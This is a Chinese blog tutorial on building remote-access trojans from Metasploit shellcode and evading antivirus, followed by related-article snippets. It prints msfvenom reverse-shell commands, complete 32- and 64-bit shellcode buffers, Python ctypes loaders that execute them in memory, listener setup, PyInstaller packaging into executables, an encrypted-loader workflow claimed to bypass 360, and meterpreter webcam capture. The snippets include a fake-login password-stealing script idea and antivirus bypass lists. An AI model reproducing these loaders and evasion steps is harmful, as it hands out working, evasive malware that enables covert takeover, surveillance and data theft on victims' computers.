木马免杀之利用shellcode生成木马

于 2025-03-09 16:17:48 发布
阅读量1k 收藏 17
点赞数 12
分类专栏: 系统入侵与提权 渗透测试 木马免杀 文章标签: 木马免杀 渗透测试 系统提权与入侵 msf框架 cobalstrike
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/YhMjQx/article/details/146134021
版权

文章目录

利用shellcode生成木马

教材内容

一、利用Python执行ShellCode
1、支持的源码格式
bash, c, csharp, dw, dword, hex, java, js_be, js_le, num, perl, pl, powershell, ps1, py, python, raw, rb, ruby, sh, vbapplication, vbscript
2、生成ShellCode
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.230.128 LPORT=6666 -f py -o shellcode.py

这个默认的windows/meterpreter/reverse_tcp模块下的shellcode应该是32位的

生成的内容如下:

buf =  b""buf += b"\xfc\xe8\x8f\x00\x00\x00\x60\x89\xe5\x31\xd2\x64"
buf += b"\x8b\x52\x30\x8b\x52\x0c\x8b\x52\x14\x0f\xb7\x4a"
buf += b"\x26\x8b\x72\x28\x31\xff\x31\xc0\xac\x3c\x61\x7c"
buf += b"\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\x49\x75\xef\x52"
buf += b"\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78"
buf += b"\x85\xc0\x74\x4c\x01\xd0\x8b\x58\x20\x01\xd3\x8b"
buf += b"\x48\x18\x50\x85\xc9\x74\x3c\x31\xff\x49\x8b\x34"
buf += b"\x8b\x01\xd6\x31\xc0\xc1\xcf\x0d\xac\x01\xc7\x38"
buf += b"\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe0\x58"
buf += b"\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c"
buf += b"\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b"
buf += b"\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b\x12"
buf += b"\xe9\x80\xff\xff\xff\x5d\x68\x33\x32\x00\x00\x68"
buf += b"\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\x89\xe8"
buf += b"\xff\xd0\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68"
buf += b"\x29\x80\x6b\x00\xff\xd5\x6a\x0a\x68\xc0\xa8\x70"
buf += b"\xd8\x68\x02\x00\x11\x5c\x89\xe6\x50\x50\x50\x50"
buf += b"\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x97"
buf += b"\x6a\x10\x56\x57\x68\x99\xa5\x74\x61\xff\xd5\x85"
buf += b"\xc0\x74\x0a\xff\x4e\x08\x75\xec\xe8\x67\x00\x00"
buf += b"\x00\x6a\x00\x6a\x04\x56\x57\x68\x02\xd9\xc8\x5f"
buf += b"\xff\xd5\x83\xf8\x00\x7e\x36\x8b\x36\x6a\x40\x68"
buf += b"\x00\x10\x00\x00\x56\x6a\x00\x68\x58\xa4\x53\xe5"
buf += b"\xff\xd5\x93\x53\x6a\x00\x56\x53\x57\x68\x02\xd9"
buf += b"\xc8\x5f\xff\xd5\x83\xf8\x00\x7d\x28\x58\x68\x00"
buf += b"\x40\x00\x00\x6a\x00\x50\x68\x0b\x2f\x0f\x30\xff"
buf += b"\xd5\x57\x68\x75\x6e\x4d\x61\xff\xd5\x5e\x5e\xff"
buf += b"\x0c\x24\x0f\x85\x70\xff\xff\xff\xe9\x9b\xff\xff"
buf += b"\xff\x01\xc3\x29\xc6\x75\xc1\xc3\xbb\xf0\xb5\xa2"
buf += b"\x56\x6a\x00\x53\xff\xd5"
3、编写32位Python加载器

ctypes 内置库:使用python可以直接调用操作系统内核API接口

import ctypes

buf =  b""
buf += b"\xfc\xe8\x8f\x00\x00\x00\x60\x89\xe5\x31\xd2\x64"
buf += b"\x8b\x52\x30\x8b\x52\x0c\x8b\x52\x14\x0f\xb7\x4a"
buf += b"\x26\x8b\x72\x28\x31\xff\x31\xc0\xac\x3c\x61\x7c"
buf += b"\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\x49\x75\xef\x52"
buf += b"\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78"
buf += b"\x85\xc0\x74\x4c\x01\xd0\x8b\x58\x20\x01\xd3\x8b"
buf += b"\x48\x18\x50\x85\xc9\x74\x3c\x31\xff\x49\x8b\x34"
buf += b"\x8b\x01\xd6\x31\xc0\xc1\xcf\x0d\xac\x01\xc7\x38"
buf += b"\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe0\x58"
buf += b"\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c"
buf += b"\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b"
buf += b"\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b\x12"
buf += b"\xe9\x80\xff\xff\xff\x5d\x68\x33\x32\x00\x00\x68"
buf += b"\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\x89\xe8"
buf += b"\xff\xd0\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68"
buf += b"\x29\x80\x6b\x00\xff\xd5\x6a\x0a\x68\xc0\xa8\x70"
buf += b"\xd8\x68\x02\x00\x11\x5c\x89\xe6\x50\x50\x50\x50"
buf += b"\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x97"
buf += b"\x6a\x10\x56\x57\x68\x99\xa5\x74\x61\xff\xd5\x85"
buf += b"\xc0\x74\x0a\xff\x4e\x08\x75\xec\xe8\x67\x00\x00"
buf += b"\x00\x6a\x00\x6a\x04\x56\x57\x68\x02\xd9\xc8\x5f"
buf += b"\xff\xd5\x83\xf8\x00\x7e\x36\x8b\x36\x6a\x40\x68"
buf += b"\x00\x10\x00\x00\x56\x6a\x00\x68\x58\xa4\x53\xe5"
buf += b"\xff\xd5\x93\x53\x6a\x00\x56\x53\x57\x68\x02\xd9"
buf += b"\xc8\x5f\xff\xd5\x83\xf8\x00\x7d\x28\x58\x68\x00"
buf += b"\x40\x00\x00\x6a\x00\x50\x68\x0b\x2f\x0f\x30\xff"
buf += b"\xd5\x57\x68\x75\x6e\x4d\x61\xff\xd5\x5e\x5e\xff"
buf += b"\x0c\x24\x0f\x85\x70\xff\xff\xff\xe9\x9b\xff\xff"
buf += b"\xff\x01\xc3\x29\xc6\x75\xc1\xc3\xbb\xf0\xb5\xa2"
buf += b"\x56\x6a\x00\x53\xff\xd5"
shellcode=bytearray(buf)
#bytearray 字节数组
# ctypes.windll.kernel32  使用ctypes调用windows的kernel32动态链接库(C:\windows\system32\kernel32.dll文件)
#VirtualAlloc 在进程的虚拟空间中分配内存的函数
ptr=ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(shellcode)),ctypes.c_int(0x3000),ctypes.c_int(0x40))
buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(ptr),buf,ctypes.c_int(len(shellcode)))
handle = ctypes.windll.kernel32.CreateThread(    
    ctypes.c_int(0),    
    ctypes.c_int(0),    
    ctypes.c_int(ptr),    
    ctypes.c_int(0),    
    ctypes.c_int(0),    
    ctypes.pointer(ctypes.c_int(0))
)
ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(handle),ctypes.c_int(-1))
4、MSF监听实现反弹
msf6 > use exploit/multi/handler

[*] Using configured payload windows/meterpreter/reverse_tcp

msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp

msf6 exploit(multi/handler) > set lhost 192.168.230.128
lhost => 192.168.230.128

msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.230.128:6666 
[*] Sending stage (175686 bytes) to 192.168.230.1

[*] Meterpreter session 8 opened (192.168.230.128:6666 -> 192.168.230.1:52594) at 2023-04-25 00:23:16 +0800

meterpreter >
5、利用Pyinstaller打包Python代码为可执行程序

pip install PyInstaller

pyinstaller -F -w pyshell.py

在生成的目录下找到pyshell.exe,实现与MSF的连接。(通常此时杀毒软件会预警)。

使用Java加载Java版本的ShellCode:https://www.4hou.com/index.php/posts/j6xW

二、使用Python 64位版加载器
1、生成x64位的ShellCode

msf6 提示符下运行以下代码,注意 set -p payload 的设置要与 opitons 中的 payload 一样

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.230.128 LPORT=6666 -f py -o shellcode_64.py

打开 shellcode_64.py

buf =  b""
buf += b"\xfc\x48\x83\xe4\xf0\xe8\xcc\x00\x00\x00\x41\x51"
buf += b"\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52"
buf += b"\x60\x48\x8b\x52\x18\x48\x8b\x52\x20\x48\x0f\xb7"
buf += b"\x4a\x4a\x48\x8b\x72\x50\x4d\x31\xc9\x48\x31\xc0"
buf += b"\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41"
buf += b"\x01\xc1\xe2\xed\x52\x48\x8b\x52\x20\x8b\x42\x3c"
buf += b"\x41\x51\x48\x01\xd0\x66\x81\x78\x18\x0b\x02\x0f"
buf += b"\x85\x72\x00\x00\x00\x8b\x80\x88\x00\x00\x00\x48"
buf += b"\x85\xc0\x74\x67\x48\x01\xd0\x8b\x48\x18\x44\x8b"
buf += b"\x40\x20\x50\x49\x01\xd0\xe3\x56\x4d\x31\xc9\x48"
buf += b"\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x48\x31\xc0"
buf += b"\x41\xc1\xc9\x0d\xac\x41\x01\xc1\x38\xe0\x75\xf1"
buf += b"\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8\x58\x44"
buf += b"\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44"
buf += b"\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x41\x58"
buf += b"\x48\x01\xd0\x41\x58\x5e\x59\x5a\x41\x58\x41\x59"
buf += b"\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41"
buf += b"\x59\x5a\x48\x8b\x12\xe9\x4b\xff\xff\xff\x5d\x49"
buf += b"\xbe\x77\x73\x32\x5f\x33\x32\x00\x00\x41\x56\x49"
buf += b"\x89\xe6\x48\x81\xec\xa0\x01\x00\x00\x49\x89\xe5"
buf += b"\x49\xbc\x02\x00\x1a\x0a\xc0\xa8\xe6\x80\x41\x54"
buf += b"\x49\x89\xe4\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07"
buf += b"\xff\xd5\x4c\x89\xea\x68\x01\x01\x00\x00\x59\x41"
buf += b"\xba\x29\x80\x6b\x00\xff\xd5\x6a\x0a\x41\x5e\x50"
buf += b"\x50\x4d\x31\xc9\x4d\x31\xc0\x48\xff\xc0\x48\x89"
buf += b"\xc2\x48\xff\xc0\x48\x89\xc1\x41\xba\xea\x0f\xdf"
buf += b"\xe0\xff\xd5\x48\x89\xc7\x6a\x10\x41\x58\x4c\x89"
buf += b"\xe2\x48\x89\xf9\x41\xba\x99\xa5\x74\x61\xff\xd5"
buf += b"\x85\xc0\x74\x0a\x49\xff\xce\x75\xe5\xe8\x93\x00"
buf += b"\x00\x00\x48\x83\xec\x10\x48\x89\xe2\x4d\x31\xc9"
buf += b"\x6a\x04\x41\x58\x48\x89\xf9\x41\xba\x02\xd9\xc8"
buf += b"\x5f\xff\xd5\x83\xf8\x00\x7e\x55\x48\x83\xc4\x20"
buf += b"\x5e\x89\xf6\x6a\x40\x41\x59\x68\x00\x10\x00\x00"
buf += b"\x41\x58\x48\x89\xf2\x48\x31\xc9\x41\xba\x58\xa4"
buf += b"\x53\xe5\xff\xd5\x48\x89\xc3\x49\x89\xc7\x4d\x31"
buf += b"\xc9\x49\x89\xf0\x48\x89\xda\x48\x89\xf9\x41\xba"
buf += b"\x02\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7d\x28\x58"
buf += b"\x41\x57\x59\x68\x00\x40\x00\x00\x41\x58\x6a\x00"
buf += b"\x5a\x41\xba\x0b\x2f\x0f\x30\xff\xd5\x57\x59\x41"
buf += b"\xba\x75\x6e\x4d\x61\xff\xd5\x49\xff\xce\xe9\x3c"
buf += b"\xff\xff\xff\x48\x01\xc3\x48\x29\xc6\x48\x85\xf6"
buf += b"\x75\xb4\x41\xff\xe7\x58\x6a\x00\x59\x49\xc7\xc2"
buf += b"\xf0\xb5\xa2\x56\xff\xd5"
2、使用64位版Python加载器
import ctypes

buf =  b""
buf += b"\xfc\x48\x83\xe4\xf0\xe8\xcc\x00\x00\x00\x41\x51".... ShellCode略 ....

ctypes.windll.kernel32.VirtualAlloc.restype=ctypes.c_uint64
rwxpage = ctypes.windll.kernel32.VirtualAlloc(0, len(buf), 0x3000, 0x40)

ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_uint64(rwxpage), ctypes.create_string_buffer(buf), len(buf))

handle = ctypes.windll.kernel32.CreateThread(0, 0, ctypes.c_uint64(rwxpage), 0, 0, 0)

ctypes.windll.kernel32.WaitForSingleObject(handle, -1)
3、kali use /exploit/multi/handler 模块开启监听

使用 /exploit/multi/handler 监听模块时,对 64 位的shellcode打包的程序进行监听时需要更改 options 中的 payload

set payload windows/x64/meterpreter/reverse_tcp

image-20240921215711721

image-20240921215848840

4、运行第二步构造的 shellcode_64.py

image-20240921215940337

image-20240921220044461

直接运行 shellcode_64.py 木马上线成功

5、在64位的Python环境安装PyInstaller,同样可以生成exe文件。

那么只要用户运行 exe 文件,木马就可以上线,并且不需要用户拥有 python 环境,因为打包的过程就会将该程序源代码运行所需要的最小的环境结合起来,类似于一个最小化的针对于该程序源代码的最小化python环境

上述加载器代码更加简洁,但是无论怎样的ShellCode,或是生成exe木马,均无法过杀毒软件,所以需要免杀。

pip install PyInstaller

pyinstaller -F -w shellcode_64.py
pyinstaller -Fw shellcode_64.py

image-20240921220756624

在 dist 目录下存在 exe 文件

image-20240921220928383

双击运行该可执行文件,即可木马上线

image-20240921221050453

将 shellcode_64.exe 放在Windows server 的虚拟机中也可以上线

image-20240921221246765

image-20240921221308417

让物理机木马上线执行一下 拍照(meterpreter 的用法) 看看可不可行

webcam_snap -i 1 -v false

image-20240921223616998

image-20240921223602736

牛逼

三、Python加载器实现免杀

1、Python编码实现

https://www.cnblogs.com/f-carey/p/16577962.html

https://forum.butian.net/share/1690

2、ShellCode Loader

(1)下载:https://github.com/Axx8/ShellCode_Loader

(2)安装Python和PyInstaller,安装Pycrypto:pycryptodome,另外,本实验需要Python 64位环境,最好使用最新版

pip install pycryptodome

(3)进入Python插件目录:\Python311\Lib\site-packages 将目录 crypto 修改为大写开头:Crypto

(4)利用MSF或CobaltStrike生成C语言的ShellCode,如使用以下msfvenom命令生成:

msfvenom -e x64/xor_dynamic -p windows/x64/meterpreter/reverse_tcp lhost=192.168.230.128 lport=6666 -f c -o shellcode_xor.c

或直接使用CobaltStrike生成也可以。

image-20240921230013896

(5)运行:Shellcode_encryption.exe payload.c 对ShellCode代码进行加密处理

  • 将 msfvenom 生成得到的 shellcode_xor.c 文件 复制到 ShellCode_Loader-main 目录下,并使用 Shellcode_encryption.exe 对 shellcode_xor.c 文件进行加密
  • image-20240921230407147
H:\NetSecureTools\ShellCode_Loader-main>Shellcode_encryption.exe shellcode_xor.c

注意:
   该项目仅供网络安全研究使用,禁止使用该项目进行违法操作,否则自行承担后果,请各位遵守《中华人民共和国网络安全法》

项目地址:
   https://github.com/Axx8/ShellCode_Loader

密文Shellcode:  vHLVRAPpxZBVILpa6Ihzzf3Iy6l6aEdFAmgtJ4olNnHp89u49Tn6+329YgM/cZjQHodRraPO+sRaXaPwmnjyX4iN6BaHz2SaBSemKJDUfueGnPdGoCd7vH6da1VIwMWmeh7MD+8+nG5AmdctLxgVeG78l6uUW2Z8qRNcjzM/WR5eGKDDcWf30OYoldr28Q6ZDnmGyDl/zS/K0Feu3nLkCtpysC+aLT/2sL4qBTNgtrJkg6JPkKnH1NdqS7+SZUSsmRSf1DbrEdSNpj5rPLG/5+SRNjuD0ULVQI//Xe8MxxDWfqAYRQKQordjlFK/2Z4aty2YdTTb4MYEb7BqWeHNnhV/F+rnpi24lXOpy/yyNBX/4LasFMd3IUia+lFwkCQzy9+lhEmErJTwk6Hxe5WpAhsFYlG4KJUdwaDwNsuXl8Qd4lEzajgeJ5QhT+cExAk6cN/dCmYngNGt6bX7xyWbKLdHykOUezmn/6j3Np3Xq94bhBcBPAoeP+QWVDsTTIFkXDc9FLXUIwQw1zxhpIHDx4PtIvI0CFKum9ug00ZZLBUdAMZ/CeMBLd11hdvYhRmYcstAK4SOXlT4kf+ZR3hBFQsb9qTUNC6vA7PEnBkgTxsNNaK9dzwQXK4l7tLhD1nHC6+eJbxpIUYzbUeCqXdSTocseUNN+RriRI7n+ZnRf7Orw52UYjmBtDMj/Nz1zxhqzHWf58zokv27nXdAQP1hqDCyu9BbZgwPUvGJFBc19gMAeysAvoYI5em1TCROAFIeqCDMf99+4lg9AKuMgRcOttMKUdaemjK8z61jXvLSlDzD7OcBvPrg443/Uidrua39494QAuuEEJ27XEwZI/u3ytkLr8bHiJrxH9x5PYuvwANT1vglW/x6rk5gjsrFktsEIA8/7YLWsEsg+S5AxxKEx9AWa5JBSk9uu5zwWeff834rpKo2aAO9lPDWqixLvlnXNd33z0I9Xgi+Fcf30rwWNsNe7jtaXDc/DkEpWBwEHG4=

(6)将生成的密文ShellCode 填至 ShellCode_Loader.py 里的 Data = ‘密文Shellcode’ 处

image-20240921230448405

(7)msf开启 run 运行ShellCode_Loader.py,确认MSF或CobaltStrike是否上线

image-20240921230714448

image-20240921230752137

image-20240921230834798

木马上线成功

或者直接在命令行中运行 ShellCode_Loader.py 也可以实现木马上线

image-20240921231109889

(8)利用PyInstaller生成可执行程序,利用杀毒软件进行检测,火绒目前不免杀,但是360免杀

image-20240921231531567

image-20240921231545565

木马测试上线成功

四、加壳程序实现免杀

压缩壳:upx,aspack ,fsg ,pecompach

加密壳:ASProtect ,Armadillo(穿山甲),EXEcryptor,Themida,ZProtect

虚拟机壳:VMProtect

【护网必备】Windows平台shellcode加载器
Fly_鹏程万里
06-14 692
bypass:McAfee、金山(数字签名)、火绒、ESET、卡巴企业版(时间5s 抖动50 Sleep_mask)、360全家桶(物理机)、Norton(加白程序资源)、WDF(PC)、WDF(Server)、Symantec(加白程序资源)bypass:金山(数字签名)、火绒、ESET、360全家桶(物理机)、WDF(PC)、WDF(服务器示复查(关云保护))、McAfee、Norton(加白程序资源)、卡巴企业版(时间5s 抖动50 Sleep_mask)必须使用Bof操作,shell运行就掉线。
反弹shell---生成木马反弹shell(Windows)
weixin_50956890的博客
05-04 4353
Windows反弹shell的一种方式--生成木马
木马getshell
lunan的博客
05-16 864
getshell:3步控制目标服务器 文章目录**getshell:3步控制目标服务器**1、什么是Web-shell?2、木马3、**什么是后门?****4、文件解析漏洞****5、制作图片马** 1、什么是Web-shell? web 的含义显然是需要服务器开放web服务 shell 是一个人机交互页面 拿 shell”的含义是取得对服务器/电脑某种程度上的操作限。 webshell拿到网站服务器的限(shell)。 webshell就是以asp、php、jsp或者cgi等网页文件形式存在的命
一文搞懂MSFvenom技术:从原理到实战
最新发布
lshen12345678的博客
03-07 1061
生成Shellcode后,手动添加异或加密或Base64编码,再通过C/C++编译加载。
linux shell ddos木马,利用Shell 脚本解决DDOS攻击问题
weixin_32687283的博客
05-15 225
思路:主要利用 awk ,if结构,sort,uniq#!/bin/bashFilePath="access.log"awk '{print $1}' $FilePath | sort -rn | uniq -c >ip_count.logcat ip_count.log | while read text ####读取文件内容,以行为单位doecho $textcount=`echo $...
shell脚本小程序之特洛伊木马示例
Echo_Ana的博客
12-26 5418
在复习Linux的时候,发现课本上有一些好玩有有意义的小程序,在这里分享给大家学习学习。下面是一个特洛伊木马shell脚本的示例,入侵利用此类程序伪装成“正常的”文本登录界面,接收用户输入的名字和密码,并保存在指定的文件中。接着“睡眠(Sleep)”几分钟,然后显示录入错误的信息,使用户以为输入有误,最后再调用真正的登录程序,允许用户正常登录。该示例脚本代码如下: echo -n "Login
基本知识,shellcode混淆
2401_84466223的博客
06-04 911
根据源代码我们看到在执行完call ebp以后,就执行了设置地址的操作,也就是说在shellcode中存在了反弹连接的ip地址,这里我们将生成的exe程序放到debug程序中,根据c的源代码,我们的shellcode是在call eax中,所以首先要搜索call eax步入进去以后就进入到shellcde中的代码,在shellcode中找到call ebp。最常见的就是360,刚刚上传的木马没有报毒,但是几分钟之内就会被检测为病毒程序,就是因为360会使用云查技术,这也是360查能力强的原因。
msfvenom——木马
tomyyyyy
08-24 3123
msfvenom——木马篇 目录msfvenom——木马篇c语言执行生成shellcode.cc语言执行检查python语言执行方法一:python加载C代码方法2:py2exe打包编译exe方法3:base64编码c语言执行 生成shellcode.c msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_t...
Metasploit 实现木马生成、捆绑及
阿里云云栖号
10-08 5653
简介:在渗透测试的过程中,避不了使用到社会工程学的方式来诱骗对方运行我们的木马或者点击我们准备好的恶意链接。木马的捆绑在社会工程学中是我们经常使用的手段,而为了躲避毒软件的查,我们又不得不对木马进行处理。本次实验我们将学习如何通过Metasploit的msfvenom命令来生成木马、捆绑木马以及对木马进行处理。木马文件风险高,想要需要用shellter工具捆绑下,但是处理后木马文件还是能被360检测到拦截下来。 实验环境: Kali Linux 知识点: msfvenom 如何生.
shellcode基础-Linux木马构造流程
weixin_43988746的博客
12-13 1094
编写Linux木马流程
ExeShellCode2.rar_加壳 源码_加壳 花指令_加密壳_壳 源码_花指令
07-15
用C语言写壳程序和加壳源码,完全支持Win7,加了一些无意义的花指令、也对壳程序里的函数机器码进行了加密
Veil-Ordnance:Veil-Ordnance是一种旨在快速生成MSF Stager Shellcode的工具
05-09
面纱军械 Veil-Ordnance旨在快速生成可用于漏洞利用或有效载荷的shellcode。 在@ christruncer,@ themightyshiv和@ harmj0y之间进行了多次讨论之后,我们得到了灵感。在这些讨论中,我们确定了需要一种生成shellcode的工具,而该工具不会改变我们的输出。 我们决定不依赖第三方来执行此操作,而是决定自己编写。 此工具中的所有有效负载均从Metasploit框架移植。 没有声称是任何有效载荷的原始作者。 在Metasploit项目上工作的出色人士都因在此工具中编写不同的有效负载而受到所有人的称赞。 他们的有效负载只是从Ruby移植到Python。 用法: ./Veil-Ordnance.py -p rev_tcp --ip 192.168.63.149-端口8675 例子: ./Veil-Ordnance.py -p rev_ht
shellcode帮助工具,直接把exe转shellcode
12-29
Shellcode Helper v1.62 Coded by TeLeMan (c) 2008-2013 Usage: schelper.exe [options] Options: -i [input file] input file (Default: stdin) -o [output file] output file (Default: stdout) -s input file format (Default: Auto-Detection) -sb input file format is Binary -sp the input file format's parameters -d output file format (Default: C format) -db output file format is Binary -dp the output file format's parameters -search get the start offset by the pattern: e.g. PK\x03\x04 -soff fix the match offset after searching (Default: 0) -off convert the input file from the offset (Default: 0) -len convert the input file with the length (Default: 0 - MAX) -en [encoder] encode shellcode (Default: XorDword) -de [encoder] decode shellcode (Default: Auto-Detection) -ex exclude characters: e.g. 0x00,0x01-0x1F,0xFF (Default: 0x00) -in incude characters only -ep the encoder's parameters -t [pid] execute or inject shellcode into process for testing -td [pid] execute or inject shellcode into process for debugging -stack put shellcode into stack and execute it (ESP is the shellcode start) -noinfo display no normal messages except error messages Available formats: 0 - C 1 - C(HexArray) 2 - Perl 3 - Python 4 - Ruby 5 - JavaScript(Escape) 6 - VBScript(Escape) 7 - Pascal 8 - MASM(Data) 9 - HexDump 10 - BitString 11 - HexString 12 - HexArray(C like) 13 - Base64 14 - Binary 15 - HexString(C like) 16 - HexString(Escape) 17 - HexString(JavaScript,UNICODE) 18 - URI(ISO-8859-1) 19 - XML(PCDATA) 20 - BigNumber 21 - BigNumber(Hex) 22 - BigNumber(BaseX) 23 - FloatPoint 24 - UnixTimestamp 25 - GUID 26 - MASM(ASM) 27 - NASM 28 - YASM(ASM) 29 - FASM(ASM) 30 - JWASM(ASM) 31 - POASM(ASM) 32 - GOASM(ASM) 33 - GNU ASM Available encoders:
清除php木马 shell,Linux如何使用shell命令检测PHP木马防止脚本木马的破坏
weixin_42299032的博客
04-08 365
1、一句话查找PHP木马代码如下#find / -name "*.php" |xargs egrep "phpspy|c99sh|milw0rm|eval\(gunerpress|eval\(base64_decoolcode|spider_bc" >> /tmp/php.txt#grep -r --include=*.php '[^a-z]eval($_POST'. >&...
一句话木马拿Shell菜刀原理
悦分享
07-12 1814
1. 直接上传asp asa jsp cer php aspx htr cdx 格式的木马,不行就加个空格或是利用IIS6.0解析漏洞,常见格式:1.asp;1.jpg 或 1.asp;.jpg 或 1.asp;jpg2. 有时上传图片格式的木马,居然被程序检测拦截了,右键记事本打开木马,在代码最前面加上gif89a,再数据库备份备份成asp格式的木马拿下shell。3. 上传图片格式木马,复制地址到数据库备份备份成asp格式木马,有时不成功的话,就利用IIs6.0解析漏洞,格式:1.asp;
4.1 MSF 制作shellcode,且运行
qq_55202378的博客
08-25 4552
msf shellcode
生命在于学习——MSF初体验(三)
易水哲的博客
10-27 1681
MSF的笔记记录(三)
msf生成木马
qq_56426046的博客
09-08 5996
1.修改特征码的最基本思想就是破坏特征,这个特征有可能是特征码,有可能是行为特征,只要破坏了病毒木马所固有的特征,并保证其原有功能没有改变,一次就能完成了。(特征码:能识别一个程序是病毒的一段不大于64字节的特征串)就目前的反病毒技术来讲,更改特征码从而达到的效果事实上包含着两种方式。一种是改特征码,这也是的最初方法。例如一个文件在某一个地址内有“灰鸽子上线成功!”这么一句话,表明它就是木马,只要将相应地址内的那句话改成别的就可以了,如果是无关痛痒的,直接将其删掉也未尝不可。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值